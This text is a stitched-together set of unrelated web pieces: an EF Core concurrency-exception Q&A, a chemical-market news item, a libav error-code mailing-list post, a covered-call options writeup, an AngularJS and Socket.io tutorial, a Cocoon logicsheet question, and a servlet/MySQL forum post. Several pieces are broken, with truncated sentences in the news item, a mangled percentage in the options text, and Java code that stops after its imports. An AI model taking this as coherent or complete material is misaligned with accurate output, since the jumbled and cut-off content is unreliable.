I'm migrating code to DotNet Core. I need to resolve a reference to
OptimisticConcurrencyException. What NuGet package do I need to load?
If you're migrating to EF Core, the closest you can get is
DbUpdateConcurrencyException.
The general approach to handling concurrency conflicts is:
- Catch DbUpdateConcurrencyException during SaveChanges.
- Use DbUpdateConcurrencyException.Entries to prepare a new set of changes for the affected entities.
- Refresh the original values of the concurrency token to reflect the current values in the database.
- Retry the process until no conflicts occur.
source:
EDIT:
OptimisticConcurrencyException is in the System.Data.Entity.Core namespace, which is part of the EntityFramework (EF6) library.
EF Core is a complete rewrite of the Entity Framework library, so it's highly likely that OptimisticConcurrencyException never made it into EF Core.
There was also this thread that suggested just catching DbUpdateConcurrencyException in EF6. It was also pointed out that having the two exceptions in EF6 just adds confusion, so maybe the EF Core team decided to implement one over the other.
If still in doubt, create an issue in the EF Core GitHub repo. They're receptive about answering issues and it might help other users with the same problem. :)
20 August 2010 22:12 [Source: ICIS news]
LONDON (ICIS)--A combination of delayed shipments, fewer imports and good demand was resulting in a tighter European monoethylene glycol (MEG) market and spot prices were climbing, sources said on Friday.
“I have never seen anything like this. The fundamentals are in place what with new capacities on stream, for prices to come down,” a buyer experiencing higher prices commented.
Even suppliers were short and prepared to pay over €700/tonne ($897/tonne) for bulk material due into
These ICIS-assessed prices were up from lows of €630/tonne CIF (cost, insurance and freight) NWE (northwest Europe).
This was evident in the spot deals reported this week at up to €715/tonne, with an offer for 2,000 tonnes €10/tonne higher.
“[Traders are] very short because they can’t import Iranian [MEG],” a reseller commented.
Proposed sanctions against
“Shipments have been delayed from August to September. All European producers say they are sold out for September because the regular importers have turned to [them] for September product,” another trader said.
Availability from the
Demand was proving to be high.
Downstream polyethylene terephthalate (PET) producers were experiencing a surge of requirements not only due to the traditional summer high season for bottlers but also from customers speculating on PET prices bottoming out in August.
Requests from the industrial sector were also kicking in.
“Consumption is very, very high. The high season is starting,” one customer said.
The tight market came as a surprise to some players and one acknowledged: “I admit, I was sure numbers would go down. In the meantime I have changed my view”.
($1 = €0.78)
> I.

I feel obliged to speak on the matter as I was the one who redefined AVERROR_* to POSIX errors.

Thing is, libav* was already returning POSIX error codes in most cases; those codes were only used in some places. Sometimes also just -1 was returned. When adding the fix for BeOS (where POSIX errors are already negative), I changed those to what seemed the closest POSIX code.

There is no way to split the error namespace to stuff either the POSIX errors or other specific errors because you can't know the values for POSIX errors. (libusb wrongly uses an arbitrary value of 50000 or something somewhere... nasty.)

On BeOS the POSIX errors are a subset of all system errors, defined like this:

#define B_GENERAL_ERROR_BASE LONG_MIN
#define B_OS_ERROR_BASE B_GENERAL_ERROR_BASE + 0x1000
#define B_APP_ERROR_BASE B_GENERAL_ERROR_BASE + 0x2000
...
#define B_STORAGE_ERROR_BASE B_GENERAL_ERROR_BASE + 0x6000
#define B_POSIX_ERROR_BASE B_GENERAL_ERROR_BASE + 0x7000
...
#define E2BIG (B_POSIX_ERROR_BASE + 1)
#define ECHILD (B_POSIX_ERROR_BASE + 2)
...
#define ENOMEM B_NO_MEMORY
#define EACCES B_PERMISSION_DENIED

Where they either map to a reserved part of the namespace, or to an existing system error. I think it's the same on win32. It could be possible to map to non-POSIX system errors, but it would be OS-dependent, which is too much hassle for not much profit.

/*--- Developer-defined errors start at (B_ERRORS_END+1)----*/
#define B_ERRORS_END (B_GENERAL_ERROR_BASE + 0xffff)

We could use unreserved parts of the namespace though to map extra errors, like:

#define AVERROR_NOMEM AVERROR(ENOMEM)
#define AVERROR_NONUM (AVERROR_BASE+0)
#define AVERROR_FMT (AVERROR_BASE+1)

with AVERROR_BASE defined in os_support.h to be in the unreserved part of the codes. On Unix that could be something like libusb's 50000... But all this is probably overkill.

As for undefined error, EINVAL is probably generic enough; didn't find better.

François.
Investors in Cameco Corp. (Symbol: CCJ) saw new options become available today, for the December 6th expiration. At Stock Options Channel, our YieldBoost formula has looked up and down the CCJ options chain for the new December CCJ, that could represent an attractive alternative to paying $9.16.78% return on the cash commitment, or 23.56% annualized — at Stock Options Channel we call this the YieldBoost.
Below is a chart showing the trailing twelve month trading history for Cameco Corp., and highlighting in green where the $9.00 strike is located relative to that history:
Turning to the calls side of the option chain, the call contract at the $9.50 strike price has a current bid of 20 cents. If an investor was to purchase shares of CCJ stock at the current price level of $9.16/share, and then sell-to-open that call contract as a "covered call," they are committing to sell the stock at $9.50. Considering the call seller will also collect the premium, that would drive a total return (excluding dividends, if any) of 5.90% if the stock gets called away at the December 6th expiration (before broker commissions). Of course, a lot of upside could potentially be left on the table if CCJ shares really soar, which is why looking at the trailing twelve month trading history for Cameco Corp., as well as studying the business fundamentals becomes important. Below is a chart showing CCJ's trailing twelve month trading history, with the $9.50 strike highlighted in red:
Considering the fact that the $9.50 strike represents an approximate 4% premium to the current trading price of the stock (in other words, it is out-of-the-money), there is also the possibility that the covered call would expire worthless, in which case the premium would represent a 2.18% boost of extra return to the investor, or 18.52% annualized, which we refer to as the YieldBoost.
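The covered-call arithmetic above can be checked directly. The sketch below (illustrative only, not Stock Options Channel's code) reproduces the 5.90% if-called return from the quoted numbers ($9.16 share price, $9.50 strike, 20-cent premium), along with the premium-only yield of about 2.18%:

```javascript
// If-called return on a covered call: price appreciation up to the
// strike plus the premium collected, relative to the purchase price.
function ifCalledReturn(purchasePrice, strike, premium) {
  return (strike - purchasePrice + premium) / purchasePrice * 100;
}

// Premium-only return if the shares are never called away.
function premiumYield(purchasePrice, premium) {
  return premium / purchasePrice * 100;
}

var ifCalled = ifCalledReturn(9.16, 9.50, 0.20);
var boost = premiumYield(9.16, 0.20);

console.log(ifCalled.toFixed(2) + '%'); // 5.90%
console.log(boost.toFixed(2) + '%');    // 2.18%
```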
The implied volatility in the put contract example is 47%, while the implied volatility in the call contract example is 43%.
Meanwhile, we calculate the actual trailing twelve month volatility (considering the last 251 trading day closing values as well as today's price of $9.16) to be 31%.
AngularJS collaboration board with Socket.io
Lukas Ruebbelke demonstrates all the steps necessary to build a real-time collaboration board powered by AngularJS and Socket.io.
- Knowledge needed: Intermediate JavaScript
- Requires: Node.js, NPM
- Project Time: 2 hours
AngularJS is particularly well-suited for creating rich client-side applications in the browser and, when you add a little Socket.io into the mix, things get really interesting. In this article we are going to build a real-time collaboration board that uses AngularJS for the client-side application and Socket.io to share state between all connected clients.
Let's cover a bit of housekeeping before we get started. I'm going to presume that you have a fundamental grasp of HTML and JavaScript as I'm not going to cover every little corner of the code. For instance, I'm not going to call out the CSS and JavaScript files I've included in the head of the HTML file as there is no new information there.
Also, I encourage you to grab the code from my GitHub account to follow along. My good friend Brian Ford also has an excellent Socket.io seed, which I based some of my original ideas on.
The main features we want in the collaboration board are the ability to create, read, update and delete notes and, for fun, move a note on the board. Yes, that's correct, we're focusing on standard CRUD features. I believe that by focusing on these fundamental features, we will have covered enough code for patterns to emerge so that you can take them and apply them elsewhere.
01. The server
We're going to start with the Node.js server first since it'll serve as the foundation that we're going to build everything else on.
We're going to be building a Node.js server with Express and Socket.io. The reason we're using Express is that it provides a nice mechanism for setting up a static asset server within Node.js. Express comes with a bunch of really awesome features but, in this case, we're going to use it to bisect the application cleanly between the server and client.
(I'm operating under the assumption that you have Node.js and NPM installed. A quick Google search will show you how to get these installed if you don't.)
02. The bare bones
So to build the bare bones of the server, we need to do a couple things to get up and running.
// app.js
// A.1
var express = require('express'),
    app = express(),
    server = require('http').createServer(app),
    io = require('socket.io').listen(server);
// A.2
app.configure(function() {
app.use(express.static(__dirname + '/public'));
});
// A.3
server.listen(1337);
A.1 We are declaring and instantiating our Node.js modules so that we can use them in our application. We are declaring Express, instantiating Express and then creating an HTTP server and sending in the Express instance into it. And from there we're instantiating Socket.io and telling it to keep an eye on our server instance.
A.2 We're then telling our Express app to use our public directory to serve files from.
A.3 We start up the server and tell it to listen on port 1337.
So far that has been pretty painless and quick. I believe we're less than 10 lines into the code and already we have a functional Node.js server. Onward!
03. Declare your dependencies
// package.json
{
"name": "angular-collab-board",
"description": "AngularJS Collaboration Board",
"version": "0.0.1-1",
"private": true,
"dependencies": {
"express": "3.x",
"socket.io": "0.9.x"
}
}
One of the nicest features of NPM is the ability to declare your dependencies in a package.json file and then automatically install them via npm install on the command line.
04. Wire up Socket.io
We have already defined the core features that we want in the application and so we need to set up Socket.io event listeners and an appropriate closure to handle the event for each operation.
In the code below you will notice that it's essentially a configuration of event listeners and callbacks. The first event is the connection event, which we use to wire up our other events in the closure.
io.sockets.on('connection', function(socket) {
socket.on('createNote', function(data) {
socket.broadcast.emit('onNoteCreated', data);
});
socket.on('updateNote', function(data) {
socket.broadcast.emit('onNoteUpdated', data);
});
socket.on('deleteNote', function(data){
socket.broadcast.emit('onNoteDeleted', data);
});
socket.on('moveNote', function(data){
socket.broadcast.emit('onNoteMoved', data);
});
});
From here we add listeners to createNote, updateNote, deleteNote and moveNote. And in the callback function, we're simply broadcasting what event happened so that any client listening can be notified that the event happened.
There are a few things worth pointing out about the callback functions in the individual event handlers. First, if you want to send an event to everyone except the client that emitted it, you insert broadcast before the emit function call. Second, we're simply passing the payload of the event on to the interested parties so that they can process it however they see fit.
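Since the server never stores any state, the only real decision in each handler is who hears the event. The framework-free sketch below is a stand-in for Socket.io (not its actual implementation) that makes the broadcast semantics concrete: the sender is excluded and everyone else receives the payload.

```javascript
// A tiny stand-in for a Socket.io hub: `emit` reaches every client,
// `broadcast` reaches every client except the sender.
function createHub() {
  var clients = [];
  return {
    connect: function() {
      var client = { inbox: [] };
      client.emit = function(event, data) {
        clients.forEach(function(c) {
          c.inbox.push({ event: event, data: data });
        });
      };
      client.broadcast = function(event, data) {
        clients.forEach(function(c) {
          if (c !== client) c.inbox.push({ event: event, data: data });
        });
      };
      clients.push(client);
      return client;
    }
  };
}

var hub = createHub();
var sender = hub.connect();
var clientA = hub.connect();
var clientB = hub.connect();

// Mirrors socket.broadcast.emit('onNoteCreated', data) on the server:
sender.broadcast('onNoteCreated', { id: 1, title: 'New Note' });

console.log(sender.inbox.length);  // 0 - the emitter is excluded
console.log(clientA.inbox.length); // 1
console.log(clientB.inbox.length); // 1
```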
05. Start your engines!
Now that we have defined our dependencies and set up our Node.js application with Express and Socket.io powers, it's quite simple to initialise the Node.js server.
First you install your Node.js dependencies like so:
npm install
And then you start the server like this:
node app.js
And then! You go to http://localhost:1337 in your browser. Bam!
06. A few candid thoughts before moving on
I'm primarily a frontend developer and I was initially a bit intimidated by hooking up a Node.js server to my application. The AngularJS part was a snap but server-side JavaScript? Cue the creepy music from a horror flick.
But I was absolutely floored to discover I could set up a static web server in just a few lines of code, and in a few more lines use Socket.io to handle all the events between the browsers. And it was still just JavaScript! For the sake of timeliness, we're only covering a few features, but I hope that by the end of the article you will see that it is easy to swim - and the deep end of the pool is not so scary.
07. The client
Now that we have our solid foundation in place with our server, let's move on to my favourite part - the client! We're going to be using AngularJS, jQueryUI for the draggable part and Twitter Bootstrap for a style base.
08. The bare bones
As a matter of personal preference, when I start a new AngularJS application I like to quickly define the bare minimum that I know I'm going to need to get started and then start iterating over that as quickly as possible.
Every AngularJS application needs to be bootstrapped with at least one controller present and so this is generally where I always start.
To automatically bootstrap the application you need to simply add ng-app to the HTML node in which you want the application to live. Most of the time, adding it to the HTML tag is going to be perfectly acceptable. I've also added an attribute to ng-app to tell it that I want to use the app module, which I will define in just a moment.
// public/index.html
<html ng-app="app">
I know I'm going to need at least one controller and so I will call that out using ng-controller and assigning it a property of MainCtrl.
<body ng-controller="MainCtrl"></body>
So now we're on the hook for a module named app and a controller named MainCtrl. Let us go ahead and create them now.
Creating a module is fairly straightforward. You define it by calling angular.module and giving it a name. For future reference, the second parameter of an empty array is where you can inject sub-modules for use in the application. It is out of the scope of this tutorial, but is handy when your application starts to grow in complexity and needs.
// public/js/collab.js
var app = angular.module('app', []);
We're going to declare a few empty placeholders in the app module starting with the MainCtrl below. We will fill these all in later but I wanted to illustrate the basic structure from the onset.
app.controller('MainCtrl', function($scope) { });
We are also going to wrap the Socket.io functionality in a socket service so that we can encapsulate that object and not leave it floating around on the global namespace.
app.factory('socket', function($rootScope) { });
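The socket service itself can stay small. One common shape for it (the approach used in Brian Ford's Socket.io seed mentioned earlier, sketched here from memory rather than copied from it) forwards on and emit to the real connection but runs each incoming callback inside $rootScope.$apply, so changes made from socket events show up in the databinding. The fakeIo and fakeRootScope stubs exist only so the sketch runs outside the browser:

```javascript
// One possible shape for the socket service: forward `on` and `emit`
// to the real Socket.io connection, but run every incoming callback
// inside $rootScope.$apply so AngularJS's databinding sees the change.
function socketFactory(io, $rootScope) {
  var socket = io.connect();
  return {
    on: function(eventName, callback) {
      socket.on(eventName, function(data) {
        $rootScope.$apply(function() {
          callback(data);
        });
      });
    },
    emit: function(eventName, data) {
      socket.emit(eventName, data);
    }
  };
}

// Stubs so the sketch can run anywhere; the real app would use the
// global `io` from the Socket.io client and Angular's own $rootScope.
var handlers = {};
var fakeSocket = {
  on: function(name, fn) { handlers[name] = fn; },
  emit: function() {}
};
var fakeIo = { connect: function() { return fakeSocket; } };
var applyCount = 0;
var fakeRootScope = { $apply: function(fn) { applyCount++; fn(); } };

var socket = socketFactory(fakeIo, fakeRootScope);
var received = null;
socket.on('onNoteCreated', function(data) { received = data; });

handlers['onNoteCreated']({ id: 42, title: 'New Note' }); // simulate the server

console.log(received.title); // New Note
console.log(applyCount);     // 1
```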
And while we are at it, we're going to declare a directive called stickyNote that we are going to use to encapsulate the sticky note functionality in.
app.directive('stickyNote', function(socket) { });
So let us review what we have done so far. We have bootstrapped the application using ng-app and declared our application controller in the HTML. We've also defined the application module and created the MainCtrl controller, the socket service and the stickyNote directive.
09. Creating a sticky note
Now that we have the skeleton of the AngularJS application in place, we will start building out the creation feature.
app.controller('MainCtrl', function($scope, socket) { // B.1
$scope.notes = []; // B.2
// Incoming
socket.on('onNoteCreated', function(data) { // B.3
$scope.notes.push(data);
});
// Outgoing
$scope.createNote = function() { // B.4
var note = {
id: new Date().getTime(),
title: 'New Note',
body: 'Pending'
};
$scope.notes.push(note);
socket.emit('createNote', note);
  };
});
B.1 AngularJS has a dependency injection feature built into it so we're injecting a $scope object and the socket service. The $scope object serves as a ViewModel and is basically a JavaScript object with some events baked into it to enable two-way databinding.
B.2 We're declaring the array in which we will use to bind the view to.
B.3 We're adding a listener for the onNoteCreated event on the socket service and pushing the event payload into the $scope.notes array.
B.4 We've declared a createNote method that creates a default note object and pushes it into the $scope.notes array. It also uses the socket service to emit the createNote event and pass the new note object along.
So now that we have a method to create the note, how do we call it? That is a good question! In the HTML file, we add the built-in AngularJS directive ng-click to the button and then add the createNote method call as the attribute value.
<button id="createButton" ng-click="createNote()">Create Note</button>
Time for a quick review of what we have done so far. We've added an array to the $scope object in the MainCtrl that's going to hold all the notes for the application. We have also added a createNote method on the $scope object to create a new local note and then broadcast that note to the other clients via the socket service. We've also added an event listener on the socket service so we can know when other clients have created a note so we can add it to our collection.
10. Displaying the sticky notes
We now have the ability to create a note object and share it between browsers but how do we actually display it? This is where directives come in.
Directives and their intricacies are a vast subject, but the short version is that they provide a way to extend elements and attributes with custom functionality. Directives are easily my favourite part of AngularJS because they allow you to essentially create an entire DSL (Domain Specific Language) around your application in HTML.
It's natural, since we are creating sticky notes for our collaboration board, that we should create a stickyNote directive. Directives are defined by calling the directive method on the module you want to declare them on and passing in a name and a function that returns a directive definition object. The directive definition object has lots of possible properties you can define on it, but we're going to use just a few for our purposes here.
I recommend that you check out the AngularJS documentation to see the entire lists of properties you can define on the directive definition object.
app.directive('stickyNote', function(socket) {
var linker = function(scope, element, attrs) { };
var controller = function($scope) { };
return {
restrict: 'A', // C.1
link: linker, // C.2
controller: controller, // C.3
scope: { // C.4
note: '=',
ondelete: '&'
}
};
});
C.1 You can restrict your directive to a certain type of HTML element. The two most common are element or attribute, which you declare using E and A respectively. You can also restrict it to a CSS class or a comment, but these are not as common.
C.2 The link function is where you put all your DOM manipulation code. There are a few exceptions that I have found, but this is always true (at least 99 per cent of the time). This is a fundamental ground rule of AngularJS and is why I have emphasised it.
C.3 The controller function works just like the main controller we defined for the application but the $scope object we're passing in is specific to the DOM element the directive lives on.
C.4 AngularJS has a concept of isolated scope, which allows you to explicitly define how a directive’s scope communicates with the outside world. If we had not declared scope the directive would have implicitly inherited from the parent scope with a parent-child relationship. In a lot of cases this is not optimal. By isolating the scope we mitigate the chances that the outside world can inadvertently and adversely affect the state of your directive.
I have declared two-way data-binding to note with the = symbol and an expression binding to ondelete with the & symbol. Please read the AngularJS documentation for a full explanation of isolated scope as it is one of the more complicated subjects in the framework.
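Stripped of Angular's machinery, the contract those two bindings create can be sketched with plain objects. In this illustration, parentScope and directiveScope are ordinary object literals standing in for real scopes: = shares the note by reference, while & hands the directive a function that evaluates a parent expression using a map of local values.

```javascript
// Plain-object stand-ins for a parent scope and a directive's isolated
// scope, illustrating what '=' and '&' bindings promise.
var parentScope = {
  note: { id: 7, title: 'New Note', body: 'Pending' },
  deletedId: null,
  deleteNote: function(id) { this.deletedId = id; }
};

var directiveScope = {
  // '=' two-way binding: both scopes reference the very same object.
  note: parentScope.note,
  // '&' expression binding: invoking it evaluates the parent expression
  // (here `deleteNote(id)`) with locals supplied as an object map.
  ondelete: function(locals) {
    parentScope.deleteNote(locals.id);
  }
};

directiveScope.note.title = 'Renamed';                   // parent sees this
directiveScope.ondelete({ id: directiveScope.note.id }); // parent runs deleteNote(7)

console.log(parentScope.note.title); // Renamed
console.log(parentScope.deletedId);  // 7
```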
So let’s actually add a sticky note to the DOM.
Like any good framework, AngularJS comes with some really great features right out of the box. One of the handiest features is ng-repeat. This AngularJS directive allows you to pass in an array of objects and it duplicates whatever tag it is on as many times as there are items in the array. In the case below, we are iterating over the notes array and duplicating the div element and its children for the length of the notes array.
<div sticky-note ng-repeat="note in notes" note="note" ondelete="deleteNote(id)">
<button type="button" class="close" ng-click="deleteNote(note.id)">×</button>
<input ng-model="note.title" ng-change="updateNote(note)"/>
<textarea ng-model="note.body" ng-change="updateNote(note)">{{note.body}}</textarea>
</div>
The beauty of ng-repeat is that it is bound to whatever array you pass in and, when you add an item to the array, your DOM element will automatically update. You can take this a step further and repeat not only standard DOM elements but other custom directives as well. That is why you see sticky-note as an attribute on the element.
There are two other bits of custom code that need to be clarified. We have isolated the scope on the sticky-notes directive on two properties. The first one is the binding defined isolated scope on the note property. This means that whenever the note object changes in the parent scope, it will automatically update the corresponding note object in the directive and vice versa. The other defined isolated scope is on the ondelete attribute. What this means is that when ondelete is called in the directive, it will call whatever expression is in the ondelete attribute on the DOM element that instantiates the directive.
When a directive is instantiated it's added to the DOM and the link function is called. This is a perfect opportunity to set some default DOM properties on the element. The element parameter we are passing in is actually a jQuery object and so we can perform jQuery operations on it.
(AngularJS actually comes with a subset of jQuery built into it but if you have already included the full version of jQuery, AngularJS will defer to that.)
app.directive('stickyNote', function(socket) {
var linker = function(scope, element, attrs) {
// Some DOM initiation to make it nice
element.css('left', '10px');
element.css('top', '50px');
element.hide().fadeIn();
};
});
In the above code we are simply positioning the sticky note on the stage and fading it in.
11. Deleting a sticky note
So now that we can add and display a sticky note, it is time to delete sticky notes. The creation and deletion of sticky notes is a matter of adding and deleting items from the array that the notes are bound to. This is the responsibility of the parent scope to maintain that array, which is why we originate the delete request from within the directive, but let the parent scope do the actual heavy lifting.
This is why we went through all the trouble of creating expression defined isolated scope on the directive: so the directive could receive the delete event internally and pass it on to its parent for processing.
Notice the HTML inside the directive.
<button type="button" class="close" ng-click="deleteNote(note.id)">×</button>
The very next thing I am going to say may seem like a long way around, but remember we are on the same side and it will make sense after I elaborate. When the button in the upper right-hand corner of the sticky note is clicked, we are calling deleteNote on the directive’s controller and passing in the note.id value. The controller then calls ondelete, which then executes whatever expression we wired up to it. So far so good? We're calling a local method on the controller, which then hands it off to the parent by calling whatever expression was defined in the isolated scope. The expression that gets called on the parent just happens to be called deleteNote as well.
app.directive('stickyNote', function(socket) {
var controller = function($scope) {
$scope.deleteNote = function(id) {
$scope.ondelete({
id: id
});
};
};
return {
restrict: 'A',
link: linker,
controller: controller,
scope: {
note: '=',
ondelete: '&'
}
};
});
(When using expression-defined isolated scope, parameters are sent in an object map.)
In the parent scope, deleteNote gets called and does a fairly standard deletion using the angular.forEach utility function to iterate over the notes array. Once the function has handled its local business it goes ahead and emits the event for the rest of the world to react accordingly.
app.controller('MainCtrl', function($scope, socket) {
$scope.notes = [];
// Incoming
socket.on('onNoteDeleted', function(data) {
$scope.deleteNote(data.id);
});
// Outgoing
$scope.deleteNote = function(id) {
var oldNotes = $scope.notes,
newNotes = [];
angular.forEach(oldNotes, function(note) {
if(note.id !== id) newNotes.push(note);
});
$scope.notes = newNotes;
socket.emit('deleteNote', {id: id});
};
});
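The array rebuild at the heart of deleteNote is ordinary JavaScript, so it can be exercised on its own. Here is the same logic isolated as a pure function, minus the $scope and socket plumbing:

```javascript
// The deletion step from MainCtrl as a pure function: keep every
// note whose id does not match the one being removed.
function deleteNoteById(notes, id) {
  var remaining = [];
  notes.forEach(function(note) {
    if (note.id !== id) remaining.push(note);
  });
  return remaining;
}

var notes = [
  { id: 1, title: 'Groceries' },
  { id: 2, title: 'Standup notes' },
  { id: 3, title: 'Ideas' }
];

var afterDelete = deleteNoteById(notes, 2);

console.log(afterDelete.length);               // 2
console.log(afterDelete[0].id, afterDelete[1].id); // 1 3
```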
12. Updating a sticky note
We're making fantastic progress! By now I hope that you are starting to see some patterns emerging from this whirlwind tour we're taking. Next item on the list is the update feature.
We're going to start at the actual DOM elements and follow it up all the way to the server and back down to the client. First we need to know when the title or body of the sticky note is being changed. AngularJS treats form elements as part of the data model so you can hook up two-way data-binding in a snap. To do this use the ng-model directive and put in the property you want to bind to. In this case we're going to use note.title and note.body respectively.
When either of these properties change we want to capture that information to pass along. We accomplish this with the ng-change directive and use it to call updateNote and pass in the note object itself. AngularJS does some very clever dirty checking to detect if the value of whatever is in ng-model has changed and then executes the expression that is in ng-change.
<input ng-model="note.title" ng-change="updateNote(note)"/>
<textarea ng-model="note.body" ng-change="updateNote(note)">{{note.body}}</textarea>
The upside of using ng-change is that the local transformation has already happened and we are just responsible for relaying the message. In the controller, updateNote is called and from there we are going to emit the updateNote event for our server to broadcast to the other clients.
app.directive('stickyNote', function(socket) {
var controller = function($scope) {
$scope.updateNote = function(note) {
socket.emit('updateNote', note);
};
};
});
And in the directive controller, we are listening for the onNoteUpdated event to know when a note from another client has updated so that we can update our local version.
var controller = function($scope) {
// Incoming
socket.on('onNoteUpdated', function(data) {
// Update if the same note
if(data.id == $scope.note.id) {
$scope.note.title = data.title;
$scope.note.body = data.body;
}
});
};
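To see the whole update path at once (edit locally, emit, patch on every other client), here is a self-contained simulation in which a plain object plays the receiving client and the payload variable stands in for what the server relays as onNoteUpdated:

```javascript
// A fake receiving client holding its own copy of the notes array,
// with the same matching logic as the directive controller above.
function makeClient(notes) {
  return {
    notes: notes,
    onNoteUpdated: function(data) {
      this.notes.forEach(function(note) {
        if (note.id === data.id) {
          note.title = data.title;
          note.body = data.body;
        }
      });
    }
  };
}

var receiver = makeClient([{ id: 5, title: 'Draft', body: 'v1' }]);

// Another client edits note 5 via ng-model/ng-change and emits
// updateNote; the server relays this payload as onNoteUpdated:
var payload = { id: 5, title: 'Final', body: 'v2' };
receiver.onNoteUpdated(payload);

console.log(receiver.notes[0].title); // Final
console.log(receiver.notes[0].body);  // v2
```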
13. Moving a sticky note
At this point we have basically done a lap around the CRUD kiddie pool and life is good! Just for the sake of a parlor trick to impress your friends, we're going to add in the ability to move notes around the screen and update coordinates in real time. Don’t panic - it's just a few more lines of code. All this hard work is going to pay off. I promise!
We've invited special guest, jQueryUI, to the party, and we did it all for the draggables. Adding in the ability to drag a note locally only takes one line of code. If you add in element.draggable(); to your linker function you will start hearing 'Eye of the Tiger' by Survivor because you can now drag your notes around.
We want to know when the dragging has stopped and capture the new coordinates to pass along. jQueryUI was built by some very smart people, so when the dragging stops you simply need to define a callback function for the stop event. We grab the note.id off the scope object and the left and top CSS values from the ui object. With that knowledge we do what we have been doing all along: emit!
app.directive('stickyNote', function(socket) {
var linker = function(scope, element, attrs) {
element.draggable({
stop: function(event, ui) {
socket.emit('moveNote', {
id: scope.note.id,
x: ui.position.left,
y: ui.position.top
});
}
});
socket.on('onNoteMoved', function(data) {
// Update if the same note
if(data.id == scope.note.id) {
element.animate({
left: data.x,
top: data.y
});
}
});
};
});
At this point it should come as no surprise that we're also listening for a move related event from the socket service. In this case it is the onNoteMoved event and if the note is a match then we update the left and top CSS properties. Bam! Done!
14. The bonus
This is a bonus section that I would not include if I were not absolutely confident you could achieve it in less than 10 minutes. We're going to deploy to a live server (I am still amazed at how easy it is to do).
First, you need to go sign up for a free Nodejitsu trial. The trial is free for 30 days, which is perfect for the sake of getting your feet wet.
Once you have created your account you need to install the jitsu package, which you can do from the command line via $ npm install jitsu -g.
Then you need to login in from the command line via $ jitsu login and enter your credentials.
Make sure you are in your app directory, type $ jitsu deploy and step through the questions. I usually leave as much to default as possible, which means I give my application a name but not a subdomain etc.
And, my dear friends, that is all there is to it! You will get the URL to your application from the output of the server once it has deployed and it is ready to go.
15. Conclusion
We've covered a lot of AngularJS ground in this article and I hope you had a lot of fun in the process. I think it's really neat what you can accomplish with AngularJS and Socket.io in approximately 200 lines of code.
There were a few things I didn't cover for the sake of focusing on the main points, but I encourage you to pull down the source and play around with the application. We have built a strong foundation, but there are still a lot of features you could add. Get hacking!
Lukas Ruebbelke is a technology enthusiast and is co-authoring AngularJS in Action for Manning Publications. His favorite thing to do is get people as excited about new technology as he is. He runs the Phoenix Web Application User Group and has hosted multiple hackathons with his fellow partners in crime.
i have a design question about xsp logicsheets. i have two logicsheets,
sql and calendar. sql retrieves results from a database, and calendar
generates a calendar view. calendar's generate method can take an argument
indicating the date around which the view should be created. i'd like for
that argument to be one of the values in the database resultset. i cannot
think of an easy way to do this using merely xsp logicsheets, but i think
it's something i ought to be able to do.
my first avenue of attack was to insert a logicsheet between the two that
would create the call to the calendar logicsheet from the results of the
sql logicsheet invokation. unfortunately, you can't match on the elements
created by the sql logicsheet - they're part of the result document. the
only way i can think of that'd you be able to do it would be to add
another XSLT and XSP process, which i'm loathe to do.
is this a design flaw in the sql logicsheet, the calendar logicsheet or a
problem in general with having logicsheets that invoke other logicsheets
with arguments chosen at runtime?
... playing ...
i'm leaning towards a design flaw in the sql logicsheet. rather than
approach the logicsheet itself by tossing everything into a java library,
a judicious use of xslt in the logicsheet might clear everything
up. supposing we modified the sql namespace so that you could write things
like this:
<sql:execute-query>
<sql:query>...</sql:query>
<sql:results>
<calendar:get-month>
<calendar:value><sql:get-string/></calendar:value>
</calendar:get-month>
</sql:results>
</sql:execute-query>
that might solve the problem, and conceivably a slew of other ones. how
would we modify the logicsheet to support that?
... coding ...
<xsl:template
<xsp:logic>
{
...
ResultSet rs = st.executeQuery("<xsl:value-of");
while (rs.next()) {
<xsl:for-each
<xsl:apply-templates/>
</xsl:for-each>
rs.close();
...
}
</xsp:logic>
</xsl:template>
<xsl:template
<xsp:expr>rs.getString("<xsl:value-of")</xsp:expr>
</xsl:template>
would this be a good way to tackle it?
if this is the best way to go about doing it, i can foresee one problem
right away - it's almost certainly going to bang people up against the 64k
java method limitation if it's written basically as i've laid it
out. how could we avoid that?
- donald | http://mail-archives.apache.org/mod_mbox/cocoon-dev/200008.mbox/%[email protected]%3E | CC-MAIN-2015-18 | refinedweb | 398 | 55.74 |
help connecting to mysql database
david halewood
Greenhorn
Joined: Dec 28, 2006
Posts: 3
posted
Dec 28, 2006 15:15:00
I got this servlet off of coreservlets.com but want to change it so instead of each catalogItem being typed in, it gets the information from a MySQL database:
package coreservlets;

/** A catalog that lists the items available in inventory.
 *  <P>
 *  Taken from Core Servlets and JavaServer Pages 2nd Edition
 *  from Prentice Hall and Sun Microsystems Press,
 *  <a href="." target="_blank" rel="nofollow">.</a>
 *  © 2003 Marty Hall; may be freely used or adapted.
 */
public class Catalog {
  // This would come from a database in real life.
  // We use a static table for ease of testing and deployment.
  // See JDBC chapters for info on using databases in
  // servlets and JSP pages.
  private static CatalogItem[] items = {
    new CatalogItem
      ("hall002",
       "<I>Core Web Programming, 2nd Edition</I> " +
       "by Marty Hall and Larry Brown",
       "One stop shopping for the Web programmer. " +
       "Topics include \n" +
       "<UL><LI>Thorough coverage of Java 2; " +
       "including Threads, Networking, Swing, \n" +
       "Java 2D, RMI, JDBC, and Collections\n" +
       "<LI>A fast introduction to HTML 4.01, " +
       "including frames, style sheets, and layers.\n" +
       "<LI>A fast introduction to HTTP 1.1, " +
       "servlets, and JavaServer Pages.\n" +
       "<LI>A quick overview of JavaScript 1.2\n" +
       "</UL>",
       49.99),
    new CatalogItem
      ("lewis001",
       "<I>The Chronicles of Narnia</I> by C.S. Lewis",
       "The classic children's adventure pitting " +
       "Aslan the Great Lion and his followers\n" +
       "against the White Witch and the forces " +
       "of evil. Dragons, magicians, quests, \n" +
       "and talking animals wound around a deep " +
       "spiritual allegory. Series includes\n" +
       "<I>The Magician's Nephew</I>,\n" +
       "<I>The Lion, the Witch and the Wardrobe</I>,\n" +
       "<I>The Horse and His Boy</I>,\n" +
       "<I>Prince Caspian</I>,\n" +
       "<I>The Voyage of the Dawn Treader</I>,\n" +
       "<I>The Silver Chair</I>, and \n" +
       "<I>The Last Battle</I>.",
       19.95)
  };

  public static CatalogItem getItem(String itemID) {
    CatalogItem item;
    if (itemID == null) {
      return(null);
    }
    for(int i=0; i<items.length; i++) {
      item = items[i];
      if (itemID.equals(item.getItemID())) {
        return(item);
      }
    }
    return(null);
  }
}
I have made the code below which gets data from MySQL tables. At the moment I use it as a simple search, but is there a way to merge the two together so the above code gets its CatalogItems by using a select statement like in the code below?
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
